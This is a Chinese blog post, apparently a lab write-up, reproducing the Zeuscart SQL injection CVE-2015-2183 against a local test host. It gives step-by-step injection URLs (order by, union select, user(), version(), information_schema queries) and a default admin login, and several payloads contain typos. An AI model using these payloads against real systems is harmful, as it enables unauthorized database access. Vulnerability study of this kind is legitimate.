Catalog
  1. 1. 漏洞复现
铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞

CVE-2015-2183 Zeuscart SQL注入漏洞
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/1.png)

漏洞复现

1.2访问【http://192.168.1.3/admin/】。如图2所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/2.png)

1.3使用账户【admin】和密码【admin888】进行登录如图3所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/3.png)

1.4访问【http://192.168.1.3/admin/?do=editcurrency&cid=1】。如图4所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/4.png)

1.5访问【http://192.168.1.3/admin/?do=editcurrency&cid=1】,发现页面和前面页面不一样,说明当前页面存在注入。如图5所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/5.png)

1.6访问【http:/192.168.1.3/admin/?do=editcurrency&cid=1+order+by+5+–+】,发现页面正常。如图6所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/6.png)

1.7访问【http://192.168.1.3/admin/?do= editcurrency&cid=1+order+by+6+–+],发现页面和前面页面不一样,说明当前查询了5个字段。如图7所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/7.png)

1.8访问【http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,2,3,4,5+--+】,发现2和4回显了。如图8所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/8.png)

1.9访问【http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+l,user(),3,ersion(),5+--+】,查询当前的用户和版本。如图9所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/9.png)

1.10访问【http://192.168.1.3/admin/?do=editcurrency&cid=l+union+select+1,group_concat(schema_name),3,4,5+from+information_schema,schemata+--+】,查询当前的所有数据库。如图10所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/10.png)

1.11在目标机中打开【C:\phpstudy\WWW\admin\classes\Core\Settings】下的【CurrencySettings.php】中的第182行,调用了editcurrency会找到showeditcurrency函数,然后判断是否接收cid参数,如果接收实例化Bin_Query类然后调用里面的executeQuery函数执行sql语句。如图11所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/11.png)

1.12打开【C:\phpstudy\WWW\Bin】下的【Query.php】中的第49行,可以看到执行sql语句并没有
过滤。如图12所示
![](/images/铁三训练营之CVE-2015-2183 Zeuscart SQL注入漏洞/12.png)

Author: 九指
Link: /2018/05/09/%E9%93%81%E4%B8%89%E8%AE%AD%E7%BB%83%E8%90%A5%E4%B9%8BCVE-2015-2183%20Zeuscart%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Donate
  • 微信
  • 支付寶